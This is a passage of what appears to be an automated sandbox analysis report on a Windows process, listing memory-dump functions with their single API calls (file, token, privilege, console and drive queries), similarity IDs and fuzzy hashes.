                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: fedc64b9831238c5b67c3c2c1e307341abdd5cbf0d1ee43af4cda03ed5785979
                                                                                            • Instruction ID: d44b4c7d027d5e339653829e5e40fb72537d3d7b169c0c452525f0abdc0f0e3b
                                                                                            • Opcode Fuzzy Hash: fedc64b9831238c5b67c3c2c1e307341abdd5cbf0d1ee43af4cda03ed5785979
                                                                                            • Instruction Fuzzy Hash: 6321A77540D780AFD3138B25DC51B62BFB4EF87B10F1981DBE8848B653D224A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 02840DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: f3c3e9879e6348851a4e6ce2b738177be50dfde1187463e14fa8c53277b479c9
                                                                                            • Instruction ID: 9956d90ff0c695ffe46aaa2ef1caa827010d7a05f126784b80308d8d7b5cef4e
                                                                                            • Opcode Fuzzy Hash: f3c3e9879e6348851a4e6ce2b738177be50dfde1187463e14fa8c53277b479c9
                                                                                            • Instruction Fuzzy Hash: 9321DE75600208AFF724DF25CC85BABFBE8EF04614F04846AE948CB282D775F804CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020ABD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,FFCD1502,00000000,00000000,00000000,00000000), ref: 020ABDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: fcad4922706c7e3878ce7f631bf27ee3d6b4012b9dac1be12b3ca3247afab99d
                                                                                            • Instruction ID: 58a51e95c67dd3c5a8c78ab74b4e445030310f65948f6b27712db6ff70af200e
                                                                                            • Opcode Fuzzy Hash: fcad4922706c7e3878ce7f631bf27ee3d6b4012b9dac1be12b3ca3247afab99d
                                                                                            • Instruction Fuzzy Hash: 7F119D72500304EFEB21DF51DC85FAAFBE8EF04724F14856AF9459A141D674A9048BB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AB04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,FFCD1502,00000000,00000000,00000000,00000000), ref: 020AB0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: 5f7dfb212b572e05cef8a23d5c17672bb6c0c974e66a798f384b48ead8cb3703
                                                                                            • Instruction ID: 918252c260ad82c7d753ea4133496af396c3b7ecd1a6ca9ea9f13a13ff598626
                                                                                            • Opcode Fuzzy Hash: 5f7dfb212b572e05cef8a23d5c17672bb6c0c974e66a798f384b48ead8cb3703
                                                                                            • Instruction Fuzzy Hash: 48117C71600304EFEB21CF65DC86FAABBE8EF15664F14846AE909CB251D674E9048AB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 02840FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: 173320e175e6de87ebdb524d2e6aa30b3ef550162ed70e7a0b9ff7dd54b2cb13
                                                                                            • Instruction ID: 2b876f8ea80151074647e071cb48afc3c313e6f9762db43d24c9053b5b3473aa
                                                                                            • Opcode Fuzzy Hash: 173320e175e6de87ebdb524d2e6aa30b3ef550162ed70e7a0b9ff7dd54b2cb13
                                                                                            • Instruction Fuzzy Hash: 4F218E7550D3C49FDB12CB25CC55B92BFB4AF13214F0C84EAE988CF693D2689408C762
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0284137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: 58f4b93ff410332ad927a0e5b0ff56ec2e71ae40f7602c10c3128022dcb0e355
                                                                                            • Instruction ID: 2a192d27176fcc37df9ac4bf6f10b7d245a1440bed17babbc219a4b4fc9b7884
                                                                                            • Opcode Fuzzy Hash: 58f4b93ff410332ad927a0e5b0ff56ec2e71ae40f7602c10c3128022dcb0e355
                                                                                            • Instruction Fuzzy Hash: AD21A4765083849FEB21CF25DC45B96FFF4EF06220F08849EED898B562D335A448DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AAAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 020AAB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 2f39c6f2bc66164880d687876ff232a2dbaf07f3688e53c678ea856c5b3878b9
                                                                                            • Instruction ID: d17809dfb095c9fed6e0f1b5b0f0eac0fbdf312e90f1413bd6122ae4b3e6276f
                                                                                            • Opcode Fuzzy Hash: 2f39c6f2bc66164880d687876ff232a2dbaf07f3688e53c678ea856c5b3878b9
                                                                                            • Instruction Fuzzy Hash: 932190716053809FDB22CF65CC54B52BFF8EF06610F0884AAED49CB292D365E804DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020ABABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 020ABB2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: BufferConsoleInfoScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3437242342-0
                                                                                            • Opcode ID: e6e5699473b19e1bc2b1c6aaef82a83afff357213bc41a200b27d049209e78c7
                                                                                            • Instruction ID: bc58cf66e57e75a3a509c437748f3877b26edfa3d9775587ffc109da4456f25f
                                                                                            • Opcode Fuzzy Hash: e6e5699473b19e1bc2b1c6aaef82a83afff357213bc41a200b27d049209e78c7
                                                                                            • Instruction Fuzzy Hash: F2219F725093C09FEB128B65DC55B96BFF4EF07220F0984DAED858F263D274A908DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028410D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 02841148
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: 526f0529f3dca0fda7f13168efa99c59b80b22bf5b17831940d628efd968f9c9
                                                                                            • Instruction ID: 09ea022f96c3c6399ff77e8e256992cf4f05c726c8bfa9c9152e60f214df851c
                                                                                            • Opcode Fuzzy Hash: 526f0529f3dca0fda7f13168efa99c59b80b22bf5b17831940d628efd968f9c9
                                                                                            • Instruction Fuzzy Hash: A5216D6540D3C49FE7138B259C54A62BFB4EF57620F0980DBD8898F2A3D6696808D772
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AAF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,FFCD1502,00000000,00000000,00000000,00000000), ref: 020AAFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 5e8c445ef2c944aea136f99877b1d74f78c342099ae198adc077a020cd7ec5c8
                                                                                            • Instruction ID: 32dce5a7d4bf0454de5ae491b93a2e8db271689f08b7027701d19a0f60b80de7
                                                                                            • Opcode Fuzzy Hash: 5e8c445ef2c944aea136f99877b1d74f78c342099ae198adc077a020cd7ec5c8
                                                                                            • Instruction Fuzzy Hash: 2011BF72500300EFEB21DF95DC85FAAFBA8EF44720F14846AE9098A281D674A904DBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020ABA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 020ABA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 3ca9cf4aa69a85707b422eefcf7a33dce64ddcc645aaa8058fdf0da2ec612466
                                                                                            • Instruction ID: 382fab0829845323fbabc00951b1a9029700052ab8b52cdc28c1ea5367d3b350
                                                                                            • Opcode Fuzzy Hash: 3ca9cf4aa69a85707b422eefcf7a33dce64ddcc645aaa8058fdf0da2ec612466
                                                                                            • Instruction Fuzzy Hash: 19118471504384AFDB22CFA5DC45B52FFF4EF15210F08849EE9868B662D375E418DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,FFCD1502,00000000,00000000,00000000,00000000), ref: 028408E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 0961724989c9ee6ece131b8fd547a3f7a3e53275210dcb83785c5f5772fc730e
                                                                                            • Instruction ID: 35b94e8d75694ee041de60ab99e7fa15493b14e43c50f2af8046a0d6251ed85a
                                                                                            • Opcode Fuzzy Hash: 0961724989c9ee6ece131b8fd547a3f7a3e53275210dcb83785c5f5772fc730e
                                                                                            • Instruction Fuzzy Hash: 79110176400308EFFB21CF50DC41FABFBA8EF04721F14885AEE099A241C670A904CBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AA33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Flags
                                                                                            • String ID:
                                                                                            • API String ID: 3401871038-0
                                                                                            • Opcode ID: 91af8eda4d7edff35966ccdf3eda6d0eb345b7285c93bdc8a2f02c2ffc3a246e
                                                                                            • Instruction ID: a814b93e3385c272fed3a3b004a7191622ad2d1592d22cadc80495ccdefe2001
                                                                                            • Opcode Fuzzy Hash: 91af8eda4d7edff35966ccdf3eda6d0eb345b7285c93bdc8a2f02c2ffc3a246e
                                                                                            • Instruction Fuzzy Hash: FE116D715093C49FEB128B15DC54B62BFB4DF47624F0880CAEDC58B263D265A808DB72
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028412D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0284132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: f919b0383390cfe6d2d2db5cbe4bee883e02c11969fcb3607312d64e35607ba6
                                                                                            • Instruction ID: cc384914143012d993ccfbcf8993baa3e21a9e6bad85f36e3daf291562107511
                                                                                            • Opcode Fuzzy Hash: f919b0383390cfe6d2d2db5cbe4bee883e02c11969fcb3607312d64e35607ba6
                                                                                            • Instruction Fuzzy Hash: FD11C4755083849FDB118F15DC49B96FFA4EF06220F0884EEED498B252D239A804CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028405E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 02840640
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: e71ad04afe21eab9c98beb791ce87d4fe3c9120118e87c6c8e86f99edbceacd4
                                                                                            • Instruction ID: 0ca8f0ff92eea322ce82a6c43764fe8d9904a4eac511ce1107e5ce7ac9725b92
                                                                                            • Opcode Fuzzy Hash: e71ad04afe21eab9c98beb791ce87d4fe3c9120118e87c6c8e86f99edbceacd4
                                                                                            • Instruction Fuzzy Hash: 9411C2755093C49FDB128B15DC95B52FFB4DF42620F0880EBED8A8B663D265A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AAA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 020AAA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 232378406a33a9149119708f2da1b5eb5f06014b29c7621ab5cc36dcc9f35370
                                                                                            • Instruction ID: 18c5f7b1beb888e37655ad73219cdb676330412fd7e7d6c4336fa951c949ab1b
                                                                                            • Opcode Fuzzy Hash: 232378406a33a9149119708f2da1b5eb5f06014b29c7621ab5cc36dcc9f35370
                                                                                            • Instruction Fuzzy Hash: 0B11C17550D7C09FE7128B11DC85B92BFB0EF13220F0980DBDD858F1A3D268A909D762
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AAAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 020AAB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 35b2e2a16c24be332b02cd50a785da116896afcba62a3a9af8628d30d6b5ae62
                                                                                            • Instruction ID: 4aa9568ff4e7deb5a675cd0e356e643c7c0d38c96970b36e6863f611f7c4239f
                                                                                            • Opcode Fuzzy Hash: 35b2e2a16c24be332b02cd50a785da116896afcba62a3a9af8628d30d6b5ae62
                                                                                            • Instruction Fuzzy Hash: 2D118EB1A113018FEB61CF69DC85B56FBF8EB04621F48C46AED0ACB682D775E404DA71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0284092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 0284099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: 295fbd68dd9d802e9a0b19b28f8ec6a6881227ecf67d4eb426520d4b60070cac
                                                                                            • Instruction ID: 18e9f07ce5a6265cad0ee589a561da7a433e511df41b26537bece952eb2abdec
                                                                                            • Opcode Fuzzy Hash: 295fbd68dd9d802e9a0b19b28f8ec6a6881227ecf67d4eb426520d4b60070cac
                                                                                            • Instruction Fuzzy Hash: 57119D758093C49FE7128B25DC55B92BFB4EF07324F0980DAD9898B263D265A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028407C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,FFCD1502,00000000,00000000,00000000,00000000), ref: 02840819
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: 9392ae45969774186bd9b9b8e372c3717b8e3db9cd8621f4023550d019f52e98
                                                                                            • Instruction ID: f38c16fd74df007bca0c1bd4b1451eb53bc96f8bc19498300d0f62beeecfca21
                                                                                            • Opcode Fuzzy Hash: 9392ae45969774186bd9b9b8e372c3717b8e3db9cd8621f4023550d019f52e98
                                                                                            • Instruction Fuzzy Hash: F6018079500708EFFB209F15DD85FA7FB98DF44721F14C09AEE099A241DA74A904CAB2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028413AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: ecd7becf5bc6698f5d1184328631cfbcbabcc9db3a2794982dccbff4216ac490
                                                                                            • Instruction ID: 6ec0f3fe5371f82ae4c6f7e288518d9fbb5521d56b8ed309099828ede22de9d7
                                                                                            • Opcode Fuzzy Hash: ecd7becf5bc6698f5d1184328631cfbcbabcc9db3a2794982dccbff4216ac490
                                                                                            • Instruction Fuzzy Hash: DC11CE79500704DFEB20CF55DC89B66FBA4EF04620F08C4AAED0ACB611D735E444CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AAB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 020AABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 95a0075063d1733af76de2fe2de3bbdff0cbb5cda457b6e5e3fce6751f74167e
                                                                                            • Instruction ID: 1dcb49abd6956b87fd830716a60ee470fa078ea56a06c41af9f098391706df90
                                                                                            • Opcode Fuzzy Hash: 95a0075063d1733af76de2fe2de3bbdff0cbb5cda457b6e5e3fce6751f74167e
                                                                                            • Instruction Fuzzy Hash: F111CEB59093809FEB11CF65DC85B82BFA4EF02220F0980ABED498F253D275A508CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020ABA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 020ABA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 105b34201461a4e2bd57e1cf43f7fac5da56b31c143368179e009daec953b7c2
                                                                                            • Instruction ID: c9d995116d5aea430b3cfee0649ba4b38bdb60b4f82344a1eb8dfbe2e33accff
                                                                                            • Opcode Fuzzy Hash: 105b34201461a4e2bd57e1cf43f7fac5da56b31c143368179e009daec953b7c2
                                                                                            • Instruction Fuzzy Hash: 59118E72500704DFEB21CF95DC45B56FBE4EF24714F4884AAED4A8A612D371E414EB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AA1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EnumWindows.USER32(?,00000E9C,?,?), ref: 020AA23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1129996299-0
                                                                                            • Opcode ID: a13815abb119073ab42972c4c0fbccb2dfed9f16ff161e0cb6eeac000f4c321e
                                                                                            • Instruction ID: 23428444d98117192de4e2c1ca08c497e064a1cbf61552d1387f7f7bf9c98f6a
                                                                                            • Opcode Fuzzy Hash: a13815abb119073ab42972c4c0fbccb2dfed9f16ff161e0cb6eeac000f4c321e
                                                                                            • Instruction Fuzzy Hash: 99018471900600AFE710DF16DC46B66FBA8FB84A20F14816AED099B741D275F515CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 028401D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: 1565fc737d8699b025fa89b0d98a030c0532443efa4d4b7d0c2675acb10089f9
                                                                                            • Instruction ID: 3eb388f0d8e149d3034f61022b43b3e4063be00d603e78b5f378f094eeafcc75
                                                                                            • Opcode Fuzzy Hash: 1565fc737d8699b025fa89b0d98a030c0532443efa4d4b7d0c2675acb10089f9
                                                                                            • Instruction Fuzzy Hash: BA019E796043488FEB10DF65DC85766FBA8EB00625F1884AADE0ACB642EB74E404CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0284104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0284109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: c8a7e8d99fbcb9678334bfbbfa3ffb059fff126e8a4384bd573b97de2a8573cb
                                                                                            • Instruction ID: d6ba45979a398a28f720e77e2047362a65753c9d33606f239a77f2882acd3990
                                                                                            • Opcode Fuzzy Hash: c8a7e8d99fbcb9678334bfbbfa3ffb059fff126e8a4384bd573b97de2a8573cb
                                                                                            • Instruction Fuzzy Hash: 17018471900600AFE310DF16DC46B66FBA8FB84B20F14816AED099B741D375F515CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020ABAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 020ABB2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: BufferConsoleInfoScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3437242342-0
                                                                                            • Opcode ID: 67e5caa5239259fb78613218167c7ed913d0d7bccf94d8d4db4679ad9ce045e9
                                                                                            • Instruction ID: 17516626fa66773693345d144e9eac8c90bed20953b8ab413dd9077f11361450
                                                                                            • Opcode Fuzzy Hash: 67e5caa5239259fb78613218167c7ed913d0d7bccf94d8d4db4679ad9ce045e9
                                                                                            • Instruction Fuzzy Hash: 7201DF71911300DFEB20CF55DC85BAAFBE4EF04625F48C4AADD0A8B256D3B5A804DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028412FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0284132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: 65e02d7fb52913b67e23445a395bc618163e0161d0225eb62a52ceb1719ff89f
                                                                                            • Instruction ID: c67561c70e378f1d12a30beacad62c0bbb5bc4aae46b7a932cc72e7e763fdfa2
                                                                                            • Opcode Fuzzy Hash: 65e02d7fb52913b67e23445a395bc618163e0161d0225eb62a52ceb1719ff89f
                                                                                            • Instruction Fuzzy Hash: C101D479504304DFEF20CF15DC89769FBA4EF04625F08C4AADD0DCB651D6799444CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AA8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 020AA94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: 19da2507687c7bd524e0fff04d22dc4fab258ab0410e195cf5ca88bed7fe2369
                                                                                            • Instruction ID: 7973b473ee5d64b106df47c111ba8eb2c45b84c02429880e8647304fe45d5f03
                                                                                            • Opcode Fuzzy Hash: 19da2507687c7bd524e0fff04d22dc4fab258ab0410e195cf5ca88bed7fe2369
                                                                                            • Instruction Fuzzy Hash: 36018671900601AFE314DF16DC46B26FBB4FB88B20F14815AED095B741D275F515CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028404B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02840502
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
